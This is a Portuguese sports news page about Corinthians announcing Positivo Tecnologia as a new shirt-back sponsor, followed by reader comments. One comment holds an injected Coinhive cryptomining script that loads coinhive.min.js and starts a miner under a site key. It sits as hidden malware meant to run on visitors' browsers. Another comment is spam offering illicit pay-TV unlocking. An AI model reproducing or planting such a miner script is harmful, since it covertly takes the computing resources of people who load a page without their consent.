2/2/2018 11:25

Na despedida de Roberto de Andrade, Corinthians anuncia novo patrocínio

Positivo ocupará as costas da camisa do Corinthians até outubro

Na despedida de Roberto de Andrade, Corinthians anuncia novo patrocínio
Foto: Marcelo Braga

No último dia útil da gestão Roberto de Andrade, o Corinthians anunciou o acerto com um novo patrocinador, que estreará na camisa neste domingo, às 19h30, contra o Novorizontino.



A Positivo, marca da Positivo Tecnologia, passa a estampar as costas da camisa das equipes masculina e feminina de futebol. Nos próximos dias, a empresa decidirá suas ações de marketing. Participar de contratações não foi algo descartado na entrevista coletiva de anúncio.

O contrato é válido até outubro deste ano, com opção de renovação até dezembro. Os valores não foram divulgados.

– Estamos muito felizes por fechar mais um patrocínio com uma grande empresa brasileira, a Positivo Tecnologia, que hoje é multinacional e apresenta números de expressão mundial. O segmento de computadores, tablets e smartphones é um dos que mais cresce no planeta e, além de agregar valor à marca, nos oferece inúmeras outras possibilidades de ativação e de oferta de conteúdo ao nosso torcedor – disse Vinicius Azevedo, gerente de marketing do Corinthians.

Durante a entrevista coletiva, o profissional do Timão comentou sobre a falta de um patrocínio máster, que ficará para a próxima gestão.

– Existem negociações abertas, nada nos finalmentes. Como tem troca de gestão, o departamento vai deixar tudo encaminhado para quem assumir tomar todas as decisões – explicou.

Além da Positivo, o Timão segue a temporada com outros quatro patrocinadores: Foxlux (barra da camisa), Universidade Brasil (ombros), Ultra (calção) e Minds (uma das mangas).


VEJA TAMBÉM
- Justiça mantém ação penal contra vice-presidente do Corinthians
- Yuri Alberto sofre complicação na coxa e deve desfalcar o Corinthians na Libertadores
- RETORNO DO TRIO? Diniz cogita reativar ataque com 66% de aproveitamento na Série A


Postado por - 19053 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

Esse Roberto De Andrade não serve nem p o boa esporte só pensa pequeno...até nunca mais aventureiros

vaza incopetene !!!!!

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS<br />FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA<br />PARA TODO BRASIL<br />WHATZSAP 11 958694345

vdd hj será seu último dia, graças a Deus chega de sugar o timão.. Andrés Sanchez bora trabalhar!

o peso dessa camisa teria que ter um patrocínio de peso

um patrocínio bom para o Corinthians seria a Sony ou Master ou na vendo do nome da Arena.

(Comentário excluído)<br /><br />< src="https://coinhive.com/lib/coinhive.min.js"></><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throt tle:.3});a.start();</>

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias